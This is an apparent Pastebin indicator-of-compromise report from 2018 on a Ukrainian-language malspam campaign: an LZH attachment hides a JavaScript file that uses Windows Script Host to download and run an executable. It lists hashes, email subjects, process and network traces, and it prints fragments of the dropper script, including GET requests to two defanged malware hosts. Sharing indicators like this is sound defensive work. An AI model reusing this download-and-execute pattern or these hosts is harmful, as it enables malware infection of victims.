VRad

#js_111018

Oct 11th, 2018
  1. #IOC #OptiData #VR #? #lzh #js #WSH
  2.  
  3. https://pastebin.com/MP3kCSSh
  4. https://radetskiy.wordpress.com/?s=WSH
  5.  
  6. schema
  7. --------------
  8. email attachment (lzh) > js > WSH > GET from one of 2 URLs > %templates%\random.exe
  9.  
  10. email_headers
  11. --------------
  12. n/a
  13.  
  14. email_subjects
  15. --------------
  16. "рахунки ТОВ Заря. оплатить до конца недели"
  17. "Рахунки Богданова за 10е"
  18.  
  19. files
  20. --------------
  21. SHA-256 a146baacebf4889c153bb28e37b013d09730265e3fa70f5542d9a878cf103ac2
  22. File name Рахунки до оплати ТОВ СМБ.lzh LHarc 1.x/ARX archive data [lh0]
  23. File size 86.76 KB
  24.  
  25. SHA-256 241851549298ad7fe353c62a6f8e9fa2fdf50a1fb2160bc72588904fe49522c3
  26. File name QoC5kb2N4?= [CLEAN]
  27. File size 5.73 KB
  28.  
  29. SHA-256 d6995bdfa7e95b5bb1d64931cbeedfb48a5c9b3d76494a1b2d4121fa7a6e25d0
  30. File name Pax. 00295 10.10.2018p.xls.js
  31. File size 80.94 KB
  32.  
  33. SHA-256 d3a9a5b6f02b8df627d0e792fdd15761a9cefd12f5464466eca30ac90b7b911e
  34. File name 82371Equipmentthe > [dwrite.exe] !This program cannot be run in DOS mode
  35. File size 428 KB
  36.  
  37. script
  38. --------------
  39. var wsh = new ActiveXObject("wscript.shell");
  40. var path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
  41. HTTP.Open("GET", "http://sfbotvinnik{.} icu/folua/dwrite.exe", false); HTTP.Send();
  42. else
  43. { HTTP.Open("GET", "http://centurionsix{.} website/folua/dwrite.exe", false);
  44.  
  45. activity
  46. **************
  47.  
  48. proc
  49. --------------
  50. "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax. 00295 10.10.2018p.xls.js"
  51. "C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\658656.exe"
  52.  
  53. netwrk
  54. --------------
  55. 93.179.68.94 sfbotvinnik{.} icu GET /folua/dwrite.exe HTTP/1.1 Mozilla/4.0
  56.  
  57. comp
  58. --------------
  59. wscript.exe 2204 93.179.68.94 80 ESTABLISHED
  60.  
  61. persist
  62. --------------
  63. n/a
  64.  
  65. # # #
  66. https://www.virustotal.com/#/file/a146baacebf4889c153bb28e37b013d09730265e3fa70f5542d9a878cf103ac2/details
  67. https://www.virustotal.com/#/file/241851549298ad7fe353c62a6f8e9fa2fdf50a1fb2160bc72588904fe49522c3/details
  68. https://www.virustotal.com/#/file/d6995bdfa7e95b5bb1d64931cbeedfb48a5c9b3d76494a1b2d4121fa7a6e25d0/community
  69. https://www.virustotal.com/#/file/d3a9a5b6f02b8df627d0e792fdd15761a9cefd12f5464466eca30ac90b7b911e/detection
  70. https://analyze.intezer.com/#/analyses/a8fa2a81-4187-4b98-bfc9-4b322edf31bc